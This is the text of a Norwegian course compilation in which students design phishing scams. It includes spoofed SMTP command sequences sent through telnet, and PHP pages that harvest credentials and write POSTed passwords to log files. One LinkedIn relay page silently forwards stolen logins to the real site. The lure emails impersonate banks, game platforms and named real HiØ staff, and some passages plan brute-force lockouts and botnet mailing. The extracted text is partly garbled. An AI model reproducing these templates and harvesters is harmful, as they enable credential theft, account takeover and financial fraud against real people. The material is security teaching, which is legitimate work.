Svindelen. HiØ Mail Phishing Scheme

Transkript

1 Svindelen Ideèn for denne svindelen kom fra alle statusmeldinger om Steam-koder og Beta-koder. Folk er uforsiktige med hva de klikker på, og blir ekstra gira når det får ting som er gratis eller billig. Dette vil vi prøve å utnytte i vår svindel. Ideèn går ut på å sende ut en mail som har Steam som avsender. Her vil det stå noe som: «Vi i Steam ønsker å belønne noen av våre utvalgte brukere. Vi har sett at du har hatt en høy gjennomsnittlig steamrating den siste tiden, og ønsker derfor og belønne deg for dette. Vedlagt i denne mailen er det en link til din gratisutgave av spillet ******. Håper du får mye glede ut av dette, og at du fortsetter å bruke våre tjenester» Linken vil da føre personen inn på en fake nettside som ser nøyaktig ut som steam sine sider med påloggingsinformasjon. Når brukeren logger seg på tar vi vare på passord og brukernavn. Vi har lagt inn en kode på siden som gjør dette automatisk. Vi kan nå uten problemer ta over brukerkontoen. Men brukeren kan ta tilbake sin hackede steamprofil ved å kontakte Steam. Det er mer lønnsomt å tappe penger fra paypalkontoen. Målet vårt er å svindle spillerne for penger fra paypalkontoen. Personen vil være innlogget, og får opp info om spillet og at de skal få det gratis. De må gjennom en vanlig «Steam checkout-prosedyre» men får beskjed om at de kommer til å bli trekt kroner 0,- og at dette er for å bekrefte at man har brukt sin kode. De kommer til en side som er identisk med paypal. Dermed har man også tilgang til brukernavn og passord på paypal og kan tømme denne. Begrunnelse Vi tror denne svindelen er lønnsom fordi den appellerer til spillere som kanskje ikke er kritiske til slike mailer. Hvis vi sender et par millioner, så kan flere bite på kroken. Spilleren tror at han/hun får ting gratis fordi de har bra steamrating ikke fordi det er en svindel. Og fordi den fake siden ser identisk ut med den originale siden, så spillerne kan ikke se at vi har lagt inn en farlig kode. Dermed er det vanskelig å avsløre svindelen. HiØ Mail Phishing Scheme Scenario: Tanken er å lage en (nøyaktig) kopi av webmailen for studententer ved HiØ og få studenter til å logge inn ved å sende en falsk mail fra IT-Drift v/hiø som sier at de har full innboks (over quota) og må slette mail. Vedlagt i mailen ligger en link (beskrevet i detalj nedenfor) som fører til siden som kopierer innloggingsiden. Når vedkommende prøver å logge inn lagres brukernavn og passord i en loggfil, dermed foretas det en redirect til den ekte webmail innloggingsiden.

2 "Angrepet" beskrevet stegvis: 1. Falsk mail.ved å sette avsender som Anne Grethe Bremnes en reell person som jobber på IT-Drift (hun har skrevet IT-Drift sin epost guide bla.) er håpet at ingen vil trekke avsender i tvil. Reply-To kan i grunn også settes til samme som avsender, da angrepet ikke er avhengig av at en annen enn avsender mottar svar. Det vil også virke mer betryggende for offeret da avsender og reply-to adresse er like ;) Legg merke til at linken som er lagt ved i mailteksten linker til mail.stud.hioff.no - ligner ved første øyekast; Hvis offeret ser mailen på en mobil enhet vil det som regel vises som HTML og den virkelige linken vil ikke vises. Selve mailen ville sett ut som dette: Hei, Vi har fått inn melding om at innboksen din er full. Du vil ikke kunne motta ny e-post før du logger inn og sletter gamle e-poster. Benytt gjerne linken her: <a href="mail.stud.hioff.no/login.php">mail.stud.hiof.no/login.php</a> Mvh. Anne Grethe Bremnes Avdelingsingeniør IT-Drift / Høgskolen i Østfold avd. Remmen E-post: anne.g.bremnes@hiof.no Tlf: Forhåpentligvis vil offeret benytte linken som er lagt til i e-posten og skrive inn brukernavn, passord og captcha-koden (sistnevnte har ingenting og si). Når offeret logger inn blir vedkommende videresendt til den virkelige innloggingsiden. I mellomtiden er brukernavn og passord snappet opp. 3. Anne Grethe vil få en del forvirrende telefoner, lukter sikkert lunta - men da er det allerede for sent for noen.

3 Beskrivelse Prosjektgruppen besluttet å lage en nettside, med noe ekstra, skjult funksjonalitet. Hensikten til nettstedet var å opplyse om fuskmistenkte på en tidligere eksamen (Webprogrammering 1, h2011). Målgruppen for svindelen var både studenter og ansatte som hadde tilknytning til nevnte eksamen. Grunnen til at gruppen valgte webprogrammering 1 er at det er mange studenter som faktisk har gjennomført dette kurset. Funksjonaliteten som ligger bak er et lite PHPscript som lagrer informasjon om brukeren i en tekstfil. Tanken var at prosjektgruppen skulle prøve å få tak i brukerens cookie, men på grunn av mangel på tid ble dette ikke noe av. Prosjektgruppen valgte å lage noe som faktisk gav brukeren det den forventet, noe som er en viktig faktor i social engineering. Videre la vi blant annet en referanse til noen lover hentet fra Hiof sine websider. For å få brukeren inn på websiden fant prosjektgruppen det nyttig å benytte seg av spoofing. Det var viktig å være saklig i eposten, samt benytte seg av en tittel og avsender som tiltrakk seg lesere. Epostoppsettet med innhold og med escapecharacters så slik ut: HELO meg.hiof.no MAIL FROM: bjornarg@hiof.no RCPT TO: list.alle.alle.it@hiof.no DATA from:"administrasjonen" <bjornarg@hiof.no> to:"mottaker" <list.alle.alle.it@hiof.no> subject: Viktig melding Til studenter og ansatte ved Hiof. I dag ble det oppdaget fusk på eksamen i kurset: ITF10208 Webprogrammering 1 Høsten Det er et større antall studenter og ansatte som er mistenkte og vi ønsker å rydde opp i dette, ved å frifinne de uskyldige som ikke hadde noe med saken å gjøre. Dette gjelder både ansatte og studenter som gjennomførte kurset eller hadde noe med kurset å gjøre. Saken er politianmeldt og det er derfor veldig viktig for skolens omdømme at saken blir oppklart med minst mulig ryktespredning. Navnene ligger sikkert lagret og er bare tilgjengelige via denne en. Av den grunn ber vi både studenter og ansatte om å sjekke listene over de misstenkte på <a href=" for å

4 finne ut om du er en av de mistenkte og hvordan du kan bevise at du ikke var med på fusk. Takk. Med vennlig hilsen Studiestedsadministrasjonen Halden 1757 Halden Telefon: QUIT URLen i eposten viste selvfølgelig ikke lenke direkte, men lenketeksten viste følgende tekst: Dette var for at ikke eposten skulle virke så mistenksom. Videre i eposten var det viktig å virke overbevisende ovenfor offeret, for eksempel tok vi med at dette gjald både studenter og ansatte. Videre baserer hele eposten seg på å skape nyskjerrighet. Har foreleseren min gjort noe galt? PHPscriptet function steal() { // Store user information in variables $address = $_SERVER['REMOTE_ADDR']; $software = $_SERVER['HTTP_USER_AGENT']; $protocol = $_SERVER['SERVER_PROTOCOL']; $time = strftime('%c'); // Open file for in append mode $fil = fopen("log.txt","a"); // Write information to file fwrite($fil, $address."###".$software."###".$protocol."###".$time."\r\n"); // Close file fclose($fil); } Dette skrev prosjektgruppen selv. Som nevnt kunne vi gjort mer, og kanskje benyttet av litt JavaScript for å hente informasjon. Men scriptet tar litt enkel informasjon og skriver det til fil. Informasjonen ble lagret slik at man enkelt kan lese det siden ved hjelp av PHP og split, og deretter f.eks finne geografisk lokasjon til IPadresse, og kanskje finne diverse mønster hos en sesifikk bruker. Funksjonen ble kjørt i body. Utdrag fra filen med informasjon Websiden ble i utgangspunktet lagret lokalt, og et utdag fra logfilen så slik ut:

5 ###Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/ (KHTML, like Gecko) Chrome/ Safari/537.22###HTTP/1.1###02/28/13 07:57: ###Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/ (KHTML, like Gecko) Chrome/ Safari/537.22###HTTP/1.1###02/28/13 07:56:47 Metode Vi planlegger å benytte forskjellige metoder for å hacke eller samle inn passord og brukernavn til forskjellige nettbaserte tjenester. Svakheten vi ønsker å utnytte, er sårbarheten rundt betalingstjenester som ikke krever godkjenning via et banksystem, eller fysisk besittelse av ofrenes bankkort. Slike tjenester eksisterer hovedsaklig for å sørge for at en bruker får en enklest mulig brukeropplevelse, men den kan fort utnyttes siden kort og kontoinformasjon ofte kan lagres i såkallte skytjenester. Fordelene med å gå fram på denne måten er at en ikke trenger å omgå sikrere systemer som f.eks Bankid. Hovedgruppen vi sikter oss inn på er ituneskontoer ettersom de har en form for betaling som tillater lagring av kortinformasjon og dermed trenger en kun brukernavn og passord for å gjennomføre en betaling. itunes er også et program som er laget av Apple, som har en raskt voksende kundegruppe. I tillegg til den raskt voksende kundegruppen deres, er de fleste Apple produkter bundet opp til å bruke itunes til aktiveringer, registrering og diverse. Bakgrunn for valg Bakgrunnen for valget vårt av hackingplattform er som nevnt ovenfor, den økende brukergruppen til itunes. En annen grunn var at vi ville gå ut ifra at motivasjonen for Phishingen var økonomisk gevinst.spredning For at en svindel skal påvirke størst mulig brukergruppe bør en velge et spredningsmedium som når ut til størst mulig publikum. Spredningsmediet vi har valgt oss er epost av den enkle grunn at det er ekstremt utbredt, og man kan skrape sammen utrolig mange epostadresser ved å kjøre script som skraper sider på nettet for alt som ligner på adresser. Mail er også ekstremt enkelt å tilpasse for å gjøre innholdet mest mulig troverdig. Forarbeid Forarbeidet som er gjort er følgende: registrere en itunes konto i sitt eget navn for å gjøre seg kjent med kundeinteraksjon på mail og betalingstjenestene som benyttes. Etter et tidligere kjøp på itunes har jeg gjort meg kjent med

6 formatet på mail som blir sendt fra itunes. Dette er nyttig å vite når man skal lage en mail for spammailene som skal sendes ut, da det øker troverdigheten til mailen. Mailens innhold ville være en forklaring på at apples lisensavtaler er oppdatert og man trenger å logge på for å godkjenne de, eller en beskjed om at noen har forsøkt å hacke kontoen deres og for å bekrefte at de er den rettmesseige eier av kontoen må de registrere seg på tilhørende lenke som kunne vært maskert via <a> tagger i html eller en URL forkorter. Linken vil da referere til en side som ser legitim ut for det utrente øyet.phishing Phishing baserer seg på å fiske til seg informasjon som kan være nyttig i forhold til pålogging eller betaling via nett. I vårt tilfelle er det snakk om påloggingsinfo som åpner for transaksjoner uten videre autentisering. For at en scam som dette skal virke må vi ta utgangspunkt i at vi har tilgang til et domene hvor vi kan sette opp vår falske side. Deretter må vi skaffe oss kildekoden for den ekte siden, samt stilsett fordi det er viktig at siden ser ekte ut. eksempel på hvordan det kunne sett ut: Etter brukeren har fyllt ut den eventuelle informasjonen og trykt på f.eks send, skrives alt til en fil som kun inneholde de oppsamlede data, og brukeren får beskjed om at siden er utilgjengelig. Gevinst En vellykket phisingscam av denne sorten ville gitt hackeren tilgang til å handle uten noen umiddelbar begrensning på kontoeierens regning. Ulemper Enhver transaksjon hvor kort benyttes vil vises på en eventuell kontoutskrift og i bankens egne betalingsoversikter.utvidelser Dersom hackeren ville gå dypere inn i å skjule sine spor kunne vedkommende forsøkt å anskaffe seg tilgang til epost kontoen tilknyttet itunes kontoen og blokkert mailer fra itunes om utførte kjøp. En annen mulighet ville være å utvikle en applikasjon som var tilgjengelig via appstore til en relativt stor sum penger, for så å gjennomføre opptil flere kjøp av samme produkt og samtidig tjene en viss prosent av salget. Del 1 Jeg valgte å lure en eldre generasjon som ikke har så mye erfaring på nett eller phising sider. Og av den gruppen som ofte bruker akkurat nettbank eller betale. Så det vil si at jeg ville lure folk med fake nettbank eller lure penger ut av dem. Da ville jeg ha gått fram med å sende en e-post til alle de forskjellige e-postene jeg finner fra nettet. Da vil jeg bruke spoofing teknikken får å få tak i

7 alle e-postene. Jeg vil da sende en e-post til mine lettlurte folk fra DnB, og selve e-posten skal være så lik DnB sin logo og slagord, mye må være likt som DnB sin side. Så vil det være en link som forteller at du må trykke deg inn på. Når brukeren har trykket seg inn på denne linken, taster brukeren inn passord og kode, slik vil jeg lure til meg pengene. Denne framgangsmåten er nok ikke den beste, vet at det er mange som bruker akkurat denne måten på nettet. Til xxx Til xxx Emne: Personoplysninger Studentweb Hei! Vi har fått en mail fra studentweb om et problem i databasen deres som følge av en systemoppdatering på nyåret. Alle adresser med særnorske bokstaver(æ, ø, å) har blitt lest inn feil og alle må logge inn snarest og oppdatere adressen sin. Har du ikke en adresse med særnorske bokstaver kan du se bort ifra denne mailen. Vi oppfordrer derimot alle å dobbeltsjekke at informasjonen er korrekt, da feil personopplysninger kan føre til problemer med lånekassen. -IT-Vakt Halden Høgskolen i Østfold - Remmen - Halden Telefon intern 5225 ekstern Vi ville sendt mailen ved å benytte metoden gjennomgått i timen, og oppgi IT-Vakt Halden som avsender. Hvis vi skulle benyttet nettet på høgskolen til å sende mailen ville vi brukt nettverkskabel, da man tvinges til å logge inn dersom man bruker det trådløse nettet. Linken i mailen skal ta offeret til en webside som speiler studentweb:

8 Når offeret skriver inn påloggingsinformasjon vil informasjonen videresendes og logges i en fil. Offeret vil få en feilmelding om at studentweb har stor pågang og er ikke tilgjengelig for øyeblikket.dermed er svindelen komplett! Gjensidige Lag en komplett svindel der du benytter teknikker som spoofing, phishing sider osv. Tenk også på ordlyd i tekst osv. Ikke bare teknologien... Om dere ikke kommer på en bedre idee, kan målet være å lure brukernavn og passord fra en utvalgte gruppe brukere, uten å bli oppdaget. Oppgaven skal leveres i PDF, der dere i tillegg til å beskrive selve svindelen, også beskriver hvorfor dere mener at fremgangsmåten dere har valgt er den beste. NB! Dere skal kun lage svindelen, ikke teste den ut Min første tanke med denne oppgaven var Gjensidige AS. Som tidligere leder av NITO studentene Halden har jeg fått utrolig mye spørsmål i forbindelse med forsikringene studentene kan få billigere igjennom NITO. Den mye brukte pc forsikringen har vært spørsmål fra mange. Og jeg har også sett en del mailer studenter har mottatt fra Gjensidige, både spam og svar på eventuelle forsikringssaker. Det jeg har sett er at Gjensidige aldri sender svaret på mail, men ofte sender en mail som informerer brukeren om at et svar er kommet og en link brukeren kan trykke på. I forbindelse med ulike studentarrangement har også Gjensidige sendt ut en del spam mail på ulike konkurranser medlemmer kan delta på. Jeg tenkte å ta utgangspunkt i disse SPAM mailene. Jeg kan ved å bruke min tillit som NITO leder spørre rundt om hvem som har Gjensidige forsikringer, og da enkelt vite hvem jeg skal sende ut spam mailen til. Oppgaven vil da bli: Jeg skal prøve å skaffe meg brukernavn og passord til sidene, fra brukere jeg vet har Gjesidige konto og som jeg enkelt vet Navn, adresse og telefonnummer på. Jeg må da lage meg en mail som er en tro kopi av en SPAM mail fra Gjensidige og få brukeren til å trykke på en link i spam mailen.

9 Først lager jeg en tro kopimail, hvor jeg bruker samme fonter og mal som Gjensidige bruker: fiktivt nummer som virker som noe logisk Jørgen Hognes Navn og adresse til kunden. Virker mer trolig når all denne infoen er korrekt Mulvadsgate Fredrikstad Tlf: NITO studentene arrangerer konkurranse. Vinn reise for ! For mer informasjon logg inn her Er det noe dere vil endre på dine forsikringer, gjør det nå! For endringer i dine forsikringer i samarbeid med Gjensidige og NITO. Logg inn her Annen info:gjensidige har i disse dager en pakkerabatt på bil og innbo forsikring. Ikke gå glipp av muligheten for å spare hele 13 % på dine forsikringer ved å samle de hos oss. For mer informasjon se her På forhånd takk. Med vennlig hilsen Gjensidige Forsikring AS Denne e-posten får du fra Gjensidige Forsikring da du tidligere har oppgitt at du ønsker informasjon via e-post. Dersom du ikke lenger ønsker å motta informasjon elektronisk fra Gjensidige Forsikring kan du endre dette her. I denne mailen har jeg prøvd å lagt til så mange link alternativer som mulig. Jeg har også nevnt NITO her inne, sånn at brukerne føler at den er rettet mot de (da jeg vet på forhånd at de er NITO medlemmer). Alle linkene går til en fiktiv Gjensidige side. Jeg har ikke laget den men lagt ved en kopi av orginalen.

10 Når brukeren taster inn informasjonen sin, vil de få opp at siden er for øyeblikket utilgjengelig og at de kan prøve igjen seinere. Hvis problemet fortsetter kan de ta kontakt på Gjensidige sin hjelpetelefon. Og så får de opp et telefonnummer. Det kan virke betryggende for brukeren og hvis de eventuelt allikevel ringer, får de opp en telefonsvar som sier at de er i kø og stor pågang. Igjen virker det betryggende at det ikke er kun «du» som har problemer med innloggingen og du føler ikke selv at du er alene. Så mens brukeren rykker stadig fremover i køen, (laaang kø), så lagres innlogginsinformasjonen i en database og jeg kan til slutt hente ut all informasjonen jeg trenger mens de står i kø. Når brukeren er nummer 5-6 i kø mister brukeren køen. Og må eventuelt prøve på nytt seinere. De som ikke på nytt prøver seg vil jo ikke vite at informasjonen deres er på avveie. Svindelen: Vi har laget en mail som sendes til alle studentene f.eks. ved lærerutdanningen ved Høgskolen i Østfold. I denne mailen forteller vi om at det er store dataproblemer som vi trenger hjelp til. For sikkerhets skyld legger vi litt press på studenten ved å fortelle at de dessverre ikke får brukt dataressursene ved høgskolen før de har gjort det som står i mailen. I mailen vi sender ut ligger det med en link til en nettside som kjører koden under i bakgrunn og logger brukernavn/passord til vedkommende. For å skape troverdighet bør nettsiden ligge under HIOF domene og ha et stilsett som er felles med hiof.no Det første vi må få til er å hente kildekoden til hiof-mailen, slik at vår side er identisk med hiof login side. Så gikk vi inn i kildekoden og endret vi på action valuen slik at når brukeren trykker på «log in» så blir brukernavn og passord lagret i en txt fil vi senere kan lese.

11 KODE: <?php header( Location: ' ); $handle = fopen( svindelpw.txt, a ); foreach($_post as $variable => $value) { fwrite($handle, $variable); fwrite($handle, = ); fwrite($handle, $value); fwrite($handle, \r\n ); } fwrite($handle, \r\n ); fclose($handle); exit;?>sender mail: Nå er svindelen vår snart klar, det eneste som gjenstår er å maile de vi vil forsøke å svindle med link til vår phising side. Under har vi skrevet hvordan vi man sender en sånn mail fra kjør i windows og med den teksten vi hadde skrevet for å lure målet: cmd telnet hal.hiof.no 25 HELO meg.hiof.no MAIL FROM: christheide@hiof.no RCPT TO: all.students@hiof.no DATA from: christheide@hiof.no to: allstudents@hiof.no subject: VIKTIG MELDING! SVAR SNAREST! Fredag kl krasjet skolens nettserver. Som følger av dette gikk mye bruker informasjon tapt. Blant annet mistet vi databasen som inneholdt informasjon om alle studentene ved lærerutdanningen på HIOF. Vi trenger hjelp av dere og ber dere snarest sende mail til itdrift@hiof.no med navn og hvilken klasse du tilhører. Dessverre kan du ikke bruke skolens dataressurser før du har sendt mail, da dette systemet også gikk ned under krasjen. Logg deg snarest inn på og bekreft, dette er utrolig viktig!!! MVH

12 Christian Heide og resten av hiof- styret. QUIT Eksempel 1 telnet hal.hiof.no 25 HELO meg.hiof.no MAIL FROM:facebook support RCPT TO: xxx DATA from:facebook support to: xxx subject: vårt "krise team" har lagt merke til mistenksom aktivitet på din facebook konto. I følge personvernloven er du pliktet til å identifisere deg på linken under, eller så ser vi oss nødt til å blokkere din konto midlertidig for å sikre deg imot misbruk av sensetiv informasjon hilsen facebook "krise team" QUIT Dette kunne kunne ha blitt sent til flere personer. Vi bruker telnet som lar oss skrive en fake avsender.mottakeren vi da tro at denne kommer fra facebook og vil da trykke på linken, som innholder en nøaktig kopi av facebooks hjemmeside. Her vil offeret taste inn brukernavn og passord som da vil bli lagret hos angriperen. Ettersom det står i personvernloven vil oferet klikke fordi han vil følge loven og ikke ha konton sin midlertidig blokkert. Dette for han til å klikke på linken som er en phisingside. Denne linken ser man tydlig at den kommer fra min studside her på skolen,etter som domain facebook.com er tatt. Det er også fult mulig og ha ip adressen stående der i stedetfor.

13 Eksempel 2 Her tar vi utgangspunkt i at folk bruker samme passord til alle tjenester. Mailen vil inneholde informasjon om konkuransen, antall penger som kan vinnes og en link. Når linken klikkes, vil man se en registreringsside, med informasjon om at denne siden vil brukes for å se hva slags premier man har vunnet, oppdatere brukerdata osv. I virkeligheten vil man kunne få personlige data om brukere og passord, som sannsynligvis også brukes til andre tjenester. Meldingen kan f.eks se sånn ut: Hei <navn til personen>! Du har blitt valgt ut som en av de få personer som får mulighet til å delta i vår konkuranse! Vi tilbyr flere premier, blant annet gavekort til flere butikker og Sydentur. I tillegg har du mulighet til å vinne 1 million kroner! Eneste du må gjøre er å registrere deg på vår nettside: <link> BraZZer Her er SPAM-mailen vi har valgt å lage. Målet er lure passord og brukernavn. Målgruppen er pornobrukere. "Hi, we are sorry to inform you that your BraZZer's account has been hacked and we need to reset your password. For this you need to type your old username and password in the link below: (denne linken skal da i utgangspunktet redirekte brukeren til.html dokumentet som er vedlagt PDFen.) The BraZZer team." Framgangsmåte: spoofing Vi mener denne fremgangsmåten er den beste, og vil gi umiddelbar virkning når man lurer brukere for brukernavn og passord. Når brukeren skriver inn passord og brukernavn vil det bli lagret i et.txt dokument svindeleren har nå tilgang til siden. Man slipper å gjøre mye arbeid, da brukere frivilig gir fra seg passord og brukernavn.

14 Del 2 Vi hadde ingen serlige SPAM mail på inbox ene våre, så vi fant denne på internett: Dear Andre Nilsen, You are receiving this message because you joined FreeLotto on Wednesday October 3rd, 2007, from IP Address *IP var fjernet fra siden*. When you registered you agreed to receive messages from FreeLotto. FreeLotto NEVER sends JUNK or SPAM messages. We never send mail to anyone unless they requested it when they registered. If you somehow didn't understand that you were agreeing to receive messages from us at the time you joined PLEASE CLICK HERE TO BE PERMANENTLY REMOVED FROM OUR LIST. In doing so you will also cancel your FreeLotto membership and you will no longer be eligible to play FreeLotto or receive up to $11,000, in daily prizes. We regret any inconvenience.thank you, FreeLotto Member Services PAID & PENDING CHECK RELEASE STATUS NOTIFICATION ACCT # / PIN # [Link fjernet av moderator] Andre, PCC, a division of PNI, has awarded over seventy-eight million in US dollars to hundreds of thousands of fortunate recipients in 41 countries; creating fourteen millionaires and four ten million US dollar winners. PNI, a sponsor of online sweepstakes, gives away awards of amounts up to ten million US dollars daily. Andre Nilsen OF Steinberg, review the official listing below to see if you are qualified to receive a check, upon proper submission in accordance with sponsor rules. FIRST NAME COUNTRY AMOUNT William UK $1,000, Andre no $ Roger OH, USA $ Nico Germany $ Andre no $10, Jennifer CA, USA $1,000, Claudio Italy $50, M.K. India $10,000, Esther Canada $100, Ariel NV, USA $10, Jamie Mexico $10, Kenneth Spain $300.00

15 Andre no $1,000, Gareth Australia $50, Clair Brazil $ Andre, if you're on the Paid and Pending list above, the next step is to verify your PIN # on the following page. It assures you, that upon submitting the winning entry in accordance with the Rules of FreeLotto, using the convenient F.A.S.T. service or the free online entry, Andre Nilsen and only Andre Nilsen will be paid $1 Million (One Million Dollars) in the Classic FreeLotto Game or other prizes. Svindelen går ut på at brukeren har registret seg på nettstedet og vunnet penger i lotto. De vil at brukeren skal registrere et bankkort som pengene kan bli overført til. Svindelen er utført gjennom spoofing. spoofing er en aktivitet der avsenderadressen og andre deler av e-header er endret for å virke som om en stammer fra en annen kilde. LinkedIn Satset på phishing, og satte som mål å hente inn e-postadresser og passord til LinkedIn-brukere (nærmere bestemt Magnus Myklatun) ved å sende dem en e-post hvor tilsynelatende Tom Heine Nätt har lagt dem til. Første del var en e-post som var en tro kopi av de LinkedIn sender ut når en bruker legger deg til som en connection. Baserte meg på en ekte e-post, og byttet ut mitt eget navn med Magnus, min e-post med hans osv. Brukte også Tom Heines profilbilde og tittel fra LinkedIn. Alle URLer som ikke var relevante lot jeg vise til riktig sted, mens "Accept" og "View Profile" viste til min phishing-side. Lot også bildene i mailen vise direkte til de originale på LinkedIn's servere. Fylte på med litt GET-variabler på slutten av noen av URLene, så de ikke skulle skille seg like mye ut om brukeren kom til å se i den retningen. Ideelt sett hadde man lagt ut phishing-siden på et helt annet domene, som f.eks. "

16 Noen utsnitt fra kildekoden: <a href=" target="_blank"> <img src=" alt="linkedin Logo" height="24" width="98" border="0"> </a><a href=" style="text-decoration:none;text-align:left" target="_blank"> <a href=" style="text-decoration:none" target="_blank"> <span style="font-size:12px;font-family:arial;font-weight:bold; color:#333333;white-space:nowrap;display:block"> Accept </span> </a> Mailen kunne nå sendes til hvem som helst. Avsender: Reply-to: Selve phishing-siden gav inntrykk av at brukeren måtte logge inn for å besvare forespørselen. Den

17 var derfor en tro kopi av siden man får hos LinkedIn om man prøver å vise innhold uten å være innlogget, men med noen viktige forskjeller: E-posten til offeret var allerede fylt ut og passordfeltet var i fokus (ved hjelp av JavaScript). Dette senker terskelen for å gå videre: brukeren regner ikke med å ha sin e-post ferdig utfylt på en fremmed side tvert i mot virker det som om man har vært inne på siden før, og trenger bare taste inn passord på nytt da innloggingen er utgått. All JavaScript som var på siden, og alle skjulte input-felter, er slettet vi vil naturlig nok ikke at siden skal kommunisere med linkedin.com, og input sørger vi selv for i neste trinn. Og viktigst av alt, data sendes naturligvis til vår egen side, login.php. Når brukeren logger inn, får altså login.php både brukernavn og passord i klartekst. Dette bearbeides og lagres av PHP-koden, før det settes inn i et nytt skjema som sendes så fort feltene er opprettet.<!doctype html> <?php if ($handle = fopen('logg.txt','a')) { fputs($handle,$_post["session_key"]." - \"".$_POST["session_password"]."\"\n"); fclose($handle); }?> <html> <body> <form action=" method="post" name="login"

18 novalidate="novalidate" id="login" class="ajax-form" data-jsenabled="check"> <input type="hidden" name="session_key" value="<?php echo $_POST["session_key"]?>" id="session_key-login" tabindex="1" data-ime-mode-disabled> <input type="hidden" name="session_password" value="<?php echo $_POST["session_password"]?>" id="session_password-login" tabindex="2"> <input type="hidden" name="signin" value="sign In" tabindex="3" class="btn-primary" id="btn-primary"> <input type="hidden" name="session_redirect" value=" id="session_redirect-login"> </form> <script> document.getelementbyid("login").submit(); </script> </body> </html> Her legger vi også til et par felter vi tok bort tidligere det viktigste av disse er session_redirect. Denne variablen styrer hvor brukeren skal sendes etter han eller hun logger inn og siden offeret allerede er tilkoblet Tom Heine på LinkedIn, vil det se mest uskyldig ut om han bare videresendes til profilen hans. Så gjenstår bare å sjekke loggfilen og lese ut brukernavn og passord. Maria Vi lager en phishing side som er identisk med maria.com hvor vi i innloggings feltet får fisket ut både brukernavn og passord. Vi sender en falsk mail fra maria.com i terminal til en gruppe med brukere der det står at om de registrerer seg nå, får de en startsum på 1000,-. Vi forklarer hva de må gjøre for å få disse pengene. Nederst legger vi en link til vår falske side, som vi ber de trykke på for å logge inn. I mailen står det:

19 Hei: (Navn på mottaker) Vi vil gjerne gi deg en startsum på 1000 kr i våre nettkasinoer om du melder deg inn i dag!! Alt du må gjøre for å få dette utrolige tilbudet er å registrere deg som bruker på våre sider og godkjenne dette tilbudet. Trykk på linken nedenfor for å logge inn Vi mener dette er en ganske overbevisende mail på mange, da det finnes langt dårligere scam mailer som folk går på. I og med at vi har med et banner av maria.com virker det enda mer troverdig. + Det er en enkel og beskjeden mail. Det er ikke store bokstaver og blinkende skrift som ser lite troverdig ut. Facebook Ettersom sosiale medier er brukt av de fleste ville vi prøvd oss på en svindel via f.eks. Facebook. Vi har tenkt ut svindelen vil se noenlunde slik ut: Fase 1: Lage en konto på facebook med en fake , en er ikke relevant. Det som derimot er relevant er brukernavnet. Brukernavnet brukes til å generere facebook , hvis brukernavnet ditt er f.eks. TomHeine vil man da få en facebook som er slik: TomHeine@facebook.com. For å utføre en svindel på personer vil vi bruke et brukernavn som inneholder lignende ord som support/kunde/service/hjelp/ eller lignende ord, også feilstavet, slik at det virker som mailen er fra noen som jobber i supportavdelingen til Facebook. Det kan også være et navn, og at man da kan presentere seg som en som jobber for Facebook. Fase2: Med en fake facebook konto og med et brukernavn som gjør at facebookmailen vår ser ut som den er fra noen av facebookstaben, så er vi klare til å forsøke svindel.

20 Vi vil via facebook kunne sende ut mail til alle som har en mailkonto. Vi vil da begynne å sende ut til folk som allerede er på facebook. Svindelen går ut på å sende en mail som er ganske lik facebookmail, samme ordforråd og oppsett. Deretter ville vi informert personen om at noen prøver å endre mailadressen/passordet dens, hvis dette ikke er deg, så send inn brukernavn og passord som svar her for å verifisere at du er den «riktige» brukeren og stoppe denne «endringen». Grunnen til at vi tror dette er en bra måte å gjøre det på er fordi vi regner med at det er mange som ikke er klar over at man kan sende mail til alle adresser med en facebookmail. Hvis vi i tillegg benytter samme ordforråd og samme oppsett i mailen som Facebook, så vil noen sikkert gå på at dette virkelig er en mail fra Facebook. Da er neste steg å «lure» brukeren til å tro at vi har oppdaget noe feil, noe vi vil hjelpe med, en feil som er på vei til å skje, og kun kan løses ved at brukeren gir ut sine brukeropplysninger. Blizzard FROM: noreplyeu@blizzard.com TO: < here> Greetings, Due to an unusual change in your access pattern, the Battle.net account < here> has been locked. This can be caused by logging in from a new location, but it may also signal an attempt to compromise your account. If you have registered for Battle.net SMS Protect, you can unlock your account by selecting Can t log in, then selecting I m currently locked out of my account, and following the steps provided. If you have not registered for Battle.net SMS Protect, or if you feel that your account s security is at risk, please follow the steps below. Step 1: Secure Your Computer Ensure that your computer is free from any malicious programs, as a password change alone may not deter future attacks. Visit our Account Security website to learn how to protect your computer from unauthorized access. Step 2: Secure Your Account Choose a new password for your account and review your for any filters or rules you did not create.

21 For more information on securing your account, visit our Account and Computer Security page. Step 3: Choose a New Password Change your password to resume using this Battle.net account, as your former password no longer grants access to any login-protected Battle.net account service or game. Visit our Password Reset page to begin the password change process. Once you ve regained access to your account, you can add additional security with Battle.net SMS Protect, a free service that allows you to unlock your Battle.net account on your own with a few simple steps. For more information, see the SMS Protect FAQ. Regards, Blizzard Entertainment Online Privacy Policy Jeg tenkte først på å lage noe slikt som dette men klarte ikke bestemme meg for hva. Syntes det ville være en bedre idé å bare bruke samme type e-post som brukere allerede får utlevert ganske ofte, hvertfall mange av dem. Et typisk eksempel på en slik mail er den man får om noen har prøvd å logge seg inn på Battle.net kontoen din fra en annen plass enn den ISPen du vanligvis logger inn fra. Kontoen vil da bli sperret og man vil få en slik mail. For å sørge for at brukeren faktisk ikke klarer å logge inn så kunne man prøvd å brute force hver konto man sender mail til et par ganger, nok til at kontoen blir sperret. Nå vet jeg ikke om dette går, men i teorien så burde det funke da Blizzard sikkert har noen form for sperring på det. Kan bruke flere proxier om dem sperrer IPadressen min. Om jeg hadde spesielle ofre ville jeg kunne ekslusivt prøve å brute force mye lengre der og gjøre alt i min makt for å få dem utesperret. Eventuelt bruke botnet for raskere utsending av e-post og brute forcing. Jeg lot alt være helt likt utenom at man må bytte ut e-posten med den adressen man sender til. Linken 'password reset' vil gå til en fake side hvor jeg godt kunne ha spandert SSL for dem som ser etter HTTPS da mange ikke tenker over å sjekke sertifikatet bare de ser den ekstra S-en i HTTPS.

